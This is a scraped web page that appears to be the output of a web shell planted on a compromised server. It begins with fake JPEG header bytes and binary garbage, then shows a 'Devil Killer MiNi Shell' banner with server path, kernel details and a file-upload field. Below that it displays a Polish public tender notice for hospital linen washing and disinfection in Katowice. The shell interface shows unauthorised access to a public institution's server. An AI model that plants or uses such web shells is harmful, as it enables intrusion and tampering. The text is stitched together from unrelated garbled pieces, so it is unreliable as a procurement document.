JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251023/0049326201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ MINISTERSTWA SPRAW WEWNĘTRZNYCH I ADMINISTRACJI W KATOWICACH IM.SIERŻANTA GRZEGORZA ZAŁOGI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271241038</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wita Stwosza 39-41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-042</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@zozmswia.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozmswia.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24d314a0-d662-4f9c-9fb9-c6abbd32370f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00493262</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00133848/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.2 PRANIE, PRASOWANIE, CZYSZCZENIE / 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zozmswiakatowice.ezamawiajacy.pl/pn/zozmswiakatowice/demand/239531/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">11.3.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się elektronicznie za pośrednictwem platformy Zamawiającego znajdującej się pod adresem: https://zozmswiakatowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.1.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>1.2.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania do Systemu.<br/>1.3.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym za pomocą Platformy przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>1.4.	Ogólne zasady korzystania z Platformy;<br/>11.8.1	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Nazwa Jednostki; https://zozmswiakatowice.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.<br/>11.8.2	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>11.8.3	Rejestracja Wykonawcy następuje automatycznie i bezzwłocznie. Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/>11.8.4	Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>11.8.5	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zamawiającego. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>1.5.	Zgodnie z art. 284 Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zamawiającego. Przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;.<br/>Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Jeżeli wniosek o wyjaśnienie treści SWZ wpłynie po upływie terminu, o którym mowa powyżej, Zamawiający nie ma obowiązku udzielania wyjaśnień oraz obowiązku przedłużania terminu składania ofert.<br/>Pozostałe informacje zostały zawarte w Rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”). Zamawiający informuje, iż administratorem danych osobowych jest Samodzielny Publiczny Zakład Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych i Administracji im. Grzegorza Załogi w Katowicach, 40-042 Katowice, ul. Wita Stwosza 39-41;<br/>Kontakt z Inspektorem Ochrony Danych - e-mail: iodo@zozmswia.katowice.pl;<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy ustawy Prawa zamówień publicznych.<br/>Pozostałe informacje zostały zawarte w Rozdziale 20.3 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”). Zamawiający informuje, iż administratorem danych osobowych jest Samodzielny Publiczny Zakład Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych i Administracji im. Grzegorza Załogi w Katowicach, 40-042 Katowice, ul. Wita Stwosza 39-41;<br/>Kontakt z Inspektorem Ochrony Danych - e-mail: iodo@zozmswia.katowice.pl;<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy ustawy Prawa zamówień publicznych.<br/>Pozostałe informacje zostały zawarte w Rozdziale 20.3 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">35/ZP/TP/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej obejmująca:<br/>5.1.1.	Pranie, dezynfekcję termiczno – chemiczną z zastosowaniem profesjonalnych środków piorąco – dezynfekcyjnych, płukania, suszenia, odplamiania, maglowania, prasowania;<br/>5.1.2.	Pranie i dezynfekcję bielizny skażonej biologicznie;<br/>5.1.3.	Segregację i pakowanie bielizny z podziałem asortymentowym;<br/>5.1.4.	Czyszczenie chemiczne (jeżeli jest wymagane przez asortyment);<br/>5.1.5.	Serwis krawiecki (zszywania, cerowania, przyszywania guzików, przyszywania troczków, naprawy zamków błyskawicznych, odplamiania itp.)<br/>5.1.6.	Odbiór i transport bielizny (brudnej i czystej) wraz z załadunkiem i rozładunkiem;<br/>5.1.7.	Prowadzenie dokumentacji zdawczo – odbiorczej.<br/>5.2.	Wspólny słownik zamówień: CPV: <br/>98311000-6 – Usługi odbierania prania<br/>98310000-9 – Usługi prania i czyszczenia na sucho<br/>98315000-4 – Usługi prasowania<br/>5.3.	Opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji i odbioru określają: <br/>5.3.1.	Formularz ofertowy – załącznik nr 1 do SWZ – z podziałem na dwa pakiety:<br/>Pakiet nr 1 - Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej w siedzibie w Katowicach przy ul. Wita Stwosza 39-41;<br/>Pakiet nr 2 - Usługa w zakresie prania, prasowania, czyszczenia, dezynfekcji oraz transportu bielizny szpitalnej w siedzibie w Częstochowie przy ul. Kopernika 38<br/>5.3.2.	Projektowane postanowienia umowy – załącznik nr 2 do SWZ <br/>5.4.	Formularz ofertowy stanowi treść oferty i nie podlega uzupełnieniu. Niezłożenie formularza ofertowego wywiedzie negatywne skutki dla Wykonawcy w postaci odrzucenia oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>5.5.	Opis przedmiotu zamówienia oraz projektowane postanowienia umowy należy odczytywać wraz <br/>z ewentualnymi zmianami treści SWZ, będącymi np. wynikiem udzielonych odpowiedzi na zapytania Wykonawców.<br/>5.6.	Szacunkowa ilość bielizny została określona w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>5.7.	Zobowiązania Wykonawcy:<br/>5.7.1.	Wykonawca posiada certyfikat systemu Zarządzania Jakością ISO 9001:2015 – w zakresie usług pralniczych oraz wdrożony system Analizy Ryzyka i Kontroli Skażenia Biologicznego (RABC/PN-EN 14065). <br/>5.7.2.	Wykonawca ponosi pełną odpowiedzialność prawną i materialną za jakość wykonywanych usług pralniczych oraz zgodność procesu pralniczego z wymogami sanitarnymi. <br/>5.7.3.	Preparaty stosowane do dezynfekcji i prania muszą posiadać wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. <br/>5.7.4.	Proces prania wykonywany będzie w zakresie temperatur 40oC – 90oC. (zgodnie z temperaturą określoną na metkach). <br/>5.7.5.	Proces termiczno – chemiczny dopuszczalny w zakresie temperatur opisanych w dokumentacji środka dezynfekcyjnego.<br/>5.7.6.	Preparaty muszą zapewniać pełne spektrum działania: B (bakterie), F (grzyby/yeasty), V (wirusy — w tym HIV, HBV), Tbc (prątki gruźlicy), S (spory, w tym Clostridioides difficile) — tzn. posiadać odpowiednie badania wg norm (np. EN 13727, EN 13624, EN 14476, EN 13704 / EN 17126 lub równoważne). Na wezwanie zamawiającego wymagane jest dostarczenie badań / certyfikatów potwierdzających skuteczność. <br/>5.7.7.	Wykonawca na żądanie Zamawiającego zobowiązany jest przedstawiać w terminie do 3 dni wyniki kontroli procesu prania w formie wydruków lub innego zapisu. <br/>5.7.8.	Zamawiający zastrzega sobie prawo przeprowadzenia w każdym czasie kontroli pralni Wykonawcy <br/>w celu zweryfikowania wymagań zarówno przed podpisaniem umowy jak i w trakcie jej realizacji. <br/>5.7.9.	Zamawiający zastrzega sobie prawo do przekazywania do prania chemicznego odrębnie wskazanego asortymentu np. poduszki z pierza lub bieliznę i odzież z trudno usuwalnymi plamami. <br/>5.7.10.	Zamawiający zastrzega sobie prawo do przekazywania do dezynfekcji komorowej odrębnie wskazanego asortymentu np. materace, podkłady, poduszki z pierza, koce itp. <br/>5.7.11.	Barierowa odzież operacyjna winna być prana zgodnie z instrukcją producenta odzieży przy użyciu wskazanych tam środków piorących lub równoważnych.<br/>5.7.12.	Bieliznę i odzież szpitalną skażoną/zakażoną Zamawiający będzie przekazywał wykonawcy w oddzielnych zamkniętych workach. <br/>5.7.13.	Wykonawca będzie dokonywał sortowania czystej bielizny i odzieży szpitalnej z zachowaniem podziału na asortyment i komórkę przeznaczenia oznaczoną symbolem wskazanym przez Zamawiającego.<br/>5.7.14.	Bielizna skażona biologicznie, bielizna operacyjna, odzież ochronna oraz nakładki na mopy powinny być prane oddzielnie od pozostałej odzieży. <br/>5.7.15.	Zamawiający zastrzega sobie prawo przeprowadzenia kontroli wypranej bielizny pod względem: czystości bielizny, czystości mikrobiologicznej, jakości prasowania. <br/>5.7.16.	Asortyment nienadający się do prania wodnego będzie czyszczony chemicznie. <br/>5.7.17.	Wykonawca zobowiązany jest do realizacji drobnych napraw krawieckich (zszywanie, cerowanie, wymiana guzików, naprawa zamków itp.).<br/>5.7.18.	Załadunek prania brudnego z brudownika oraz rozładunek prania czystego we wskazanym przez Zamawiającego miejscu będzie wykonywane za pomocą wózków transportowych (za pomocą transporterów koszykowych z pokrowcami bakteriostatycznymi lub wózkami o pełnych ścianach). <br/>Pozostałe informacje zostały zawarte w Rozdziale 5 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98311000-6 - Usługi odbierania prania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98310000-9 - Usługi prania i czyszczenia na sucho</p> <p class="mb-0">98315000-4 - Usługi prasowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty najkorzystniejszej zamawiający kierować się będzie następującymi kryteriami oceny ofert z przypisaniem im odpowiednio wag:<br/>1)	Cena - 60% = 60 pkt <br/>2)	Termin rozpatrzenia reklamacji - 30% = 30 pkt<br/>3)	Rodzaj pralnicy – 10% = 10 pkt <br/><br/>Punkty oferty zsumowane wg wzoru:<br/>Suma = C + R<br/> gdzie:<br/>Suma - suma punktów badanej oferty,<br/>C	- ilość punktów uzyskanych za kryterium CENA<br/>T	- ilość punktów uzyskanych za kryterium TERMIN ROZPATRZENIA REKLAMACJI<br/>R	- ilość punktów uzyskanych za kryterium RODZAJ PRALNICY<br/><br/>2.	Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1)	CENA<br/> C = (C min / C of ) x 60 gdzie: <br/>C min - cena najniższa spośród ocenianych ofert <br/>C of - cena ocenianej oferty <br/>C - liczba punktów za kryterium ceny<br/> <br/>	ceny w powyższym wzorze rozumiane są jako ceny brutto za realizację całości przedmiotu zamówienia;<br/>	maksymalna liczba punktów do uzyskania w kryterium CENA wynosi 60 pkt;<br/>	ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w formularzu ofertowym stanowiącym załącznik do SWZ;<br/>	punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki<br/>	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny<br/><br/>2)	TERMIN ROZPATRZENIA REKLAMACJI<br/>Termin rozpatrzenia reklamacji z tytułu źle wypranego asortymentu, zagubienia, zniszczenia, uszkodzenia asortymentu <br/>w procesie prania:<br/>- do 2 dni roboczych od momentu zgłoszenia - ilość punktów - 30<br/>- do 3 dni roboczych od momentu zgłoszenia - ilość punktów - 15<br/>- do 4 dni roboczych od momentu zgłoszenia - ilość punktów - 0<br/><br/>	maksymalna liczba punktów do uzyskania w niniejszym kryterium wynosi 30 pkt <br/>	maksymalną ilość punktów w zakresie tego kryterium otrzyma oferta Wykonawcy, który zaoferuje najkrótszy oceniany czas tj. do 2 dni roboczych od momentu telefonicznego zgłoszenia przez Zamawiającego.<br/>	jeżeli Wykonawca nie poda terminu rozpatrzenia reklamacji, Zamawiający przyjmie, <br/>że składając ofertę Wykonawca oferuje najdłuższy dopuszczony termin rozpatrzenia reklamacji czyli do 4 dni roboczych od momentu telefonicznego zgłoszenia przez Zamawiającego i nie otrzyma punktów w kryterium „termin rozpatrzenia reklamacji.”<br/>	jeżeli Wykonawca poda w ofercie termin rozpatrzenia reklamacji powyżej 4 dni roboczych od momentu zgłoszenia, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5 jako niezgodną z warunkami zamówienia. <br/>	ocenie w ramach kryterium podlegać będzie informacja podana przez Wykonawcę w formularzu ofertowym. Kryterium to będzie rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym terminu rozpatrzenia reklamacji<br/><br/>3)	RODZAJ PRALNICY<br/><br/>Maksymalna liczba punktów do uzyskania w kryterium „Rodzaj pralnicy” wynosi 10 punktów. Punktacja zostanie przyznana w następujący sposób:<br/>Przedmiot umowy prany w pralnicy tunelowej zakończonej wirówką, która stanowi wyposażenie pralni Wykonawcy<br/>TAK – 10 pkt<br/>NIE – 0 pkt<br/> <br/>Wykonawca w formularzu ofertowym winien wskazać czy przedmiot umowy prany będzie w pralnicy tunelowej zakończonej wirówką. W przypadku braku wskazania żadnej odpowiedzi, Zamawiający uzna, iż wykonawca nie będzie realizował usługi prania w pralnicy tunelowej zakończonej wirówką i nie przyzna punktów w kryterium.<br/><br/>3.	Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie ze wszystkich kryteriów i spełniająca pozostałe 